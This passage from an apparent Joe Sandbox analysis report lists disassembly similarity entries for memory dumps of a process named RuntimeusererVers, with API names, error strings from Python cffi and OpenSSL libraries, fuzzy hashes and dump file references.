                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                          • String ID: array size would overflow a Py_ssize_t
                                                                                                                                                                                                                                          • API String ID: 1450464846-3850734049
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • pointer subtraction: the distance between the two pointers is not a multiple of the item size, xrefs: 00007FF81E50684E
                                                                                                                                                                                                                                          • cannot subtract cdata '%s' and cdata '%s', xrefs: 00007FF81E50687C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: cannot subtract cdata '%s' and cdata '%s'$pointer subtraction: the distance between the two pointers is not a multiple of the item size
                                                                                                                                                                                                                                          • API String ID: 4212644371-3794040536
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: ctype '%s' is of unknown size$expected a 'cdata' or 'ctype' object
                                                                                                                                                                                                                                          • API String ID: 4212644371-2764735189
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyErr_Format.PYTHON311 ref: 00007FF81E5039D1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E5011A0: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF81E5011EB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format__stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: initializer for ctype 'char16_t' must be a unicode string of length 1, not %.200s$larger-than-0xFFFF character$unicode string of length %zd
                                                                                                                                                                                                                                          • API String ID: 3682193652-3085492373
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$_strtoui64
                                                                                                                                                                                                                                          • String ID: number too large
                                                                                                                                                                                                                                          • API String ID: 3513630032-2371285140
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_FromLong_SizeSsize_tStringTuple_
                                                                                                                                                                                                                                          • String ID: offsetof() expects at least 2 arguments
                                                                                                                                                                                                                                          • API String ID: 1664805531-4287892465
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: ctype '%s' is of unknown alignment$found for ctype '%s' bogus alignment '%d'
                                                                                                                                                                                                                                          • API String ID: 376477240-1437467885
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1767461275-1080266419
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_numL_sk_valueR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 2441919041-1080266419
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Arg_FormatKeywords_OccurredParseSizeTuple
                                                                                                                                                                                                                                          • String ID: integer constant '%.200s' not found
                                                                                                                                                                                                                                          • API String ID: 2363003521-2598228679
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: buffer assignment index out of range$must assign a bytes of length 1, not %.200s
                                                                                                                                                                                                                                          • API String ID: 4212644371-1215531179
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Size$Arg_BuildErr_ParseStringTuple_Value_
                                                                                                                                                                                                                                          • String ID: (On)$O!O|i:typeoffsetof
                                                                                                                                                                                                                                          • API String ID: 1294453720-945657874
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeDeallocFormatFromJ_nid2lnUnicode_X_md
                                                                                                                                                                                                                                          • String ID: <%U %s object @ %p>
                                                                                                                                                                                                                                          • API String ID: 2860719311-1790359138
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_get_versionL_is_init_finishedstrcmp
                                                                                                                                                                                                                                          • String ID: unknown
                                                                                                                                                                                                                                          • API String ID: 1061301088-2904991687
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeDeallocFormatFromJ_nid2lnUnicode_X_get_md
                                                                                                                                                                                                                                          • String ID: <%U HMAC object @ %p>
                                                                                                                                                                                                                                          • API String ID: 3107003933-749664232
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_typeDeallocFormatFromJ_nid2lnUnicode_X_get_md
                                                                                                                                                                                                                                          • String ID: hmac-%U
                                                                                                                                                                                                                                          • API String ID: 3107003933-3757664071
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Bytes_Err_FromO_ctrlSize
                                                                                                                                                                                                                                          • String ID: Not a memory BIO
                                                                                                                                                                                                                                          • API String ID: 2349510700-587638661
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$ConditionEnterVariableWake
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3011652882-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$ConditionEnterLeaveSleepVariablememmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 344065560-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$uint_fas$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-2104825828
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$uint_lea$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-79748562
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$ptrd$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-2113229806
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$intm$unsigned
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$uint$unsigned
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$uint_fas$unsigned
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$ssiz$unsigned
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$ClearDeallocDict_Err_SubtypeTuple_Type_Unicode_
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_dupE_freeL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_MemoryX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1734961617-0
                                                                                                                                                                                                                                          • Opcode ID: 26a9737d9c483c4cd300f75d1bb5afd118c35b3aaeed0cebe0b030120f9dbb19
                                                                                                                                                                                                                                          • Instruction ID: cf834b6943324786d969cb843a44430eaea881ce8c5e798c05ec1ba6e929bb6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26a9737d9c483c4cd300f75d1bb5afd118c35b3aaeed0cebe0b030120f9dbb19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D017120B18F4382FB04DB22A94893AA391AF88BE4F444531EE4E47B55EE2CF4E18740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_free$F_parse_listL_sk_new_null
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4265814531-0
                                                                                                                                                                                                                                          • Opcode ID: 7df82fb949e12bf4a216ac0d1243a055229da8c8e7b3ff2f6a825a281c0e489e
                                                                                                                                                                                                                                          • Instruction ID: 2c8e50c73726a7a44aa03ab76fe86e1f0a65c2c1b0dd7047b925a94d8c20d135
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7df82fb949e12bf4a216ac0d1243a055229da8c8e7b3ff2f6a825a281c0e489e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87011E62B08E4281EA519F15E40166963A4FF45BD4F584231FF8C47B9ADE3DED928700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Unicode_$LibrarySize$Arg_CharDeallocErr_ErrorFormatFreeLastLoadObject_ParseTuple_Wide_strdup
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2194358736-0
                                                                                                                                                                                                                                          • Opcode ID: 0d56a0c859934923879f683db9f7b9aa5a668714a52902b4eaf57cb2498fd1a1
                                                                                                                                                                                                                                          • Instruction ID: 23fc9314b1f150cedfbced6f2a5a46784c2a93db05db6c823e93be27c261f9dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d56a0c859934923879f683db9f7b9aa5a668714a52902b4eaf57cb2498fd1a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB014C32A09E42C2EA188F64E9605B9B3A0FF88BF4B440235EA8D02754DF7CF5448740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HMAC_CTX_new.LIBCRYPTO-1_1 ref: 00007FF81E4E5345
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E6168: PyThread_acquire_lock.PYTHON311(?,?,?,00007FF81E4E535E), ref: 00007FF81E4E6188
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E6168: PyEval_SaveThread.PYTHON311(?,?,?,00007FF81E4E535E), ref: 00007FF81E4E6192
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E6168: PyThread_acquire_lock.PYTHON311(?,?,?,00007FF81E4E535E), ref: 00007FF81E4E61A4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E6168: PyEval_RestoreThread.PYTHON311(?,?,?,00007FF81E4E535E), ref: 00007FF81E4E61AD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E6168: HMAC_CTX_copy.LIBCRYPTO-1_1(?,?,?,00007FF81E4E535E), ref: 00007FF81E4E61BA
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E6168: PyThread_release_lock.PYTHON311(?,?,?,00007FF81E4E535E), ref: 00007FF81E4E61CB
                                                                                                                                                                                                                                          • HMAC_CTX_free.LIBCRYPTO-1_1 ref: 00007FF81E4E5365
                                                                                                                                                                                                                                          • _PyObject_New.PYTHON311 ref: 00007FF81E4E5382
                                                                                                                                                                                                                                          • HMAC_CTX_free.LIBCRYPTO-1_1 ref: 00007FF81E4E5390
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lockX_free$Object_RestoreSaveThread_release_lockX_copyX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 601750000-0
                                                                                                                                                                                                                                          • Opcode ID: 0e3a070ecd3b7a3debc5875b18767ee878027075bc1fe35294d808bbe2eb8e39
                                                                                                                                                                                                                                          • Instruction ID: 16da4ffef3f167e02fc3f16b1649f1f07fb8bd56f971573c298f9391d38de2a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e3a070ecd3b7a3debc5875b18767ee878027075bc1fe35294d808bbe2eb8e39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB011D21A08F0381FA54DB22A958A396390AF88FF0F184634C94E4B755EF7CF4E08340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
